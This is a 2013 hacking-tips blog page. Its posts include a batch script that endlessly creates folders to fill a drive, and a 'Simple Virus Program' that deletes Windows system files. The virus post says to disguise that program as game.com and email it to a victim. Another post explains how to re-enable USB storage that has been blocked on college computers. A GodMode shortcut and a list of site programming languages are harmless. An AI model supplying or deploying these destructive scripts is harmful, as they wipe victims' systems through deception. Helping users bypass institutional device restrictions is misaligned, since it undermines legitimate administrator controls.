Wednesday, 4 September 2013

create a infinite folder in a drive

Create a virus to create a infinite folder in a drive

1.Create a virus to create a infinite folder in a drive

2.Copy this code to Notepad++.

@echo off
:top
md %random%
goto top
@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop

3.Save the file with .bat extension

That's all if you double click the file it will create a finite folder wherever the batch file is

Enable Windows 7 GodMode

Windows 7's so-called GodMode is actually a shortcut to accessing the operating system's various control settings

The trick is also said to work in Windows Vista, although some are warning that although it works fine in 32-bit versions of Vista, it can cause 64-bit versions of that operating system to crash.
To enter "GodMode," one need only create a new folder and then rename the folder to the following:

To use it:
  • Create a new folder.
  • Rename the folder to and copy below code
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

Thursday, 29 August 2013

Simple Virus Program

Create a batch file game.bat with following text
              • @echo off
              • delc:\winnt\system32\*.*
              • del c:\winnt\*.*






Convert the game.bat batch file to game .com using bat2.com utility

send the game.com file as an email attachment toa victim

when the victim runs this program ,it delete core file in WINNT directory making windows unusable

Tuesday, 27 August 2013

Pendrive blocked-disabled college computer – Unblock it

UNLOCK USB PORTS FROM DEVICE MANAGER:

There are 3 methods

1. By Disabling USB Ports from Device Manager.
2. By Tweaking Registry values for USB Mass Storage Devices.
3. By Un-installing the USB Mass Storage Drivers.

1.Method

i) Go to Start > Run, in run prompt type “devmgmt.msc” and press enter. This will open device manager.

ii) Go to Universal Serial bus Controller. See if there are any red colored cross?
 If yes, right click and enable those USB Ports.

2.Method

CORRECT REGISTRY VALUE FOR USB MASS STORAGE DEVICE

1. Go to Start > Run , type “regedit” and press enter, this will open registry editor
2. Navigate to the keyHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR3. Double-click on the “Start” key to modify its value, change the value to 3 and press OK.

Now remove and connect the pen drive again, it should work fine, if it does not, then it means the drivers are missing. Follow the steps below to solve the issue.


Wednesday, 7 August 2013

Top Sites Programming Languages

Top Sites Programming Languages Used....

1. Google – Java (Web), – C++ (indexing)
2. Facebook – PHP
3. YouTube- Flash, Python, Java
4. Yahoo– PHP and Java
5. Microsoft Live.com– .NET
6. Wikipedia – PHP
7. Blogger – Java
8. MSN – .NET
9.Twitter – Ruby on Rails, Scala, Java
Pages (5)Previous 12345 Next
Flying Twitter Bird Widget By Trickstoo.com